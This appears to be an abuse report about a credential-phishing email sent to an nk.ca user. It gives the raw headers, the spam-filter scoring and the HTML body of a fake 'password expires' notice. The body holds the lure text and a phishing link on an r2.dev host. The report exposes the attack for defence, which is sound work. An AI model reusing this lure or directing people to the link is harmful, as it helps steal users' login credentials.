Credential phish on nk.ca users from nuxt networks Germany and Krixe Pte in the Netherlands

Return-path:

Envelope-to: aboo@nk.ca

Delivery-date: Tue, 11 Jun 2024 09:08:00 -0600

Received: from [147.45.197.250] (port=41492 helo=t-rexbaby.co.jp)

by doctor.nl2k.ab.ca with esmtp (Exim 4.97.1 (FreeBSD))

(envelope-from )

id 1sH35i-000000008IN-01TH

for aboo@nk.ca;

Tue, 11 Jun 2024 09:07:23 -0600

Received: from [38.255.61.249] (localhost [IPv6:::1])

by t-rexbaby.co.jp (Postfix) with ESMTP id CD3183063E0

for ; Tue, 11 Jun 2024 16:40:51 +0200 (CEST)

From: nk.ca

To: aboo@nk.ca

Subject: aboo@nk.ca Password expires notification

Date: 11 Jun 2024 16:40:51 +0200

Message-ID: <20240611164051.D94B24F974298CAF@daiya-tsusho.co.jp>

MIME-Version: 1.0

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 21.7

X-Spam_score_int: 217

X-Spam_bar: +++++++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: Dear aboo Your email aboo@nk.ca password expires today. Continue

with the same password below to avoid disconnection.



Content analysis details: (21.7 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[147.45.197.250 listed in dnsbl.ahbl.org]

[147.45.197.250 listed in dnsbl.ahbl.org]

[147.45.197.250 listed in dnsbl.ahbl.org]

[147.45.197.250 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[147.45.197.250 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[147.45.197.250 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[147.45.197.250 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[147.45.197.250 listed in dnsbl.ahbl.org]

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[147.45.197.250 listed in will-spam-for-food.eu.org]

[147.45.197.250 listed in will-spam-for-food.eu.org]

[147.45.197.250 listed in will-spam-for-food.eu.org]

[147.45.197.250 listed in will-spam-for-food.eu.org]

[147.45.197.250 listed in will-spam-for-food.eu.org]

[147.45.197.250 listed in will-spam-for-food.eu.org]

[147.45.197.250 listed in will-spam-for-food.eu.org]

[147.45.197.250 listed in will-spam-for-food.eu.org]

1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist

[URI: pub-04e98cff18e4472a81f25d74577167d2.r2.dev]

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.9 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail)

1.0 HK_RANDOM_FROM From username looks random

0.6 HK_RANDOM_ENVFROM Envelope sender username looks random

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.0 HTML_MESSAGE BODY: HTML included in message

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

-0.0 T_SCC_BODY_TEXT_LINE No description available.

0.0 GOOG_REDIR_NORDNS Google redirect to obscure spamvertised website +

no rDNS

0.7 TO_NO_BRKTS_FROM_MSSP Multiple formatting errors

1.5 VOWEL_FROM_6 Impronouncable from header (6 consecutive vowels)

2.0 PDS_DBL_URL_TNB_RUNON Double-url and To no arrows, from runon

0.0 T_FROM_MISSP_DKIM From misspaced, DKIM dependable

0.1 TO_IN_SUBJ To address is in Subject

0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only

1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)

2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level

above 50%

[cf: 100]

0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%

[cf: 100]

0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe

Subject: {SPAM?} aboo@nk.ca Password expires notification

X-Antivirus: AVG (VPS 240611-2, 6/11/2024), Inbound message

X-Antivirus-Status: Clean
















one; text-indent: 0px; letter-spacing: normal; font-family: Arial, Helvetic=

a, sans-serif; font-size: 15px; font-style: normal; font-weight: 400; word-=

spacing: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-liga=

tures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; t=

ext-decoration-thickness: initial; text-decoration-style: initial; text-dec=

oration-color: initial;">

Dear
gb(0, 128, 0);"> aboo




text-indent: 0px; letter-spacing: normal; font-family: Arial, Helvetica, sa=

ns-serif; font-size: 15px; font-style: normal; font-weight: 400; word-spaci=

ng: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-ligatures=

: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=

ecoration-thickness: initial; text-decoration-style: initial; text-decorati=

on-color: initial;">

Your email 
n style=3D"color: rgb(255, 0, 0);">aboo@nk.ca
 password expi=

res today.
Continue with the same password below to=

avoid disconnection.




; color: rgb(36, 36, 36); text-transform: none; text-indent: 0px; letter-sp=

acing: normal; font-family: Arial, Helvetica, sans-serif; font-size: 15px; =

font-style: normal; font-weight: 400; word-spacing: 0px; vertical-align: ba=

seline; white-space: normal; orphans: 2; widows: 2; font-stretch: inherit; =

font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-str=

oke-width: 0px; text-decoration-thickness: initial;=20

text-decoration-style: initial; text-decoration-color: initial; font-varian=

t-numeric: inherit; font-variant-east-asian: inherit;">
s Serif">


55, 255); vertical-align: baseline; display: inline-block; background-color=

: blue; text-decoration-line: none;" href=3D"https://pub-04e98cff18e4472a81=

f25d74577167d2.r2.dev/index.html#aboo@nk.ca" target=3D"_blank" rel=3D"noope=

ner noreferrer"=20

data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://pub-04e98cff=

18e4472a81f25d74577167d2.r2.dev/index.html%23%5B%5B-Email-%5D%5D&source=

=3Dgmail&ust=3D1718107626365000&usg=3DAOvVaw3hvrxNopdfFnu_T7hbiJMI"=

>Keep the same password


Serif">
"3">IT Support

">This notification is assigned to 
;">

aboo@nk.ca.

>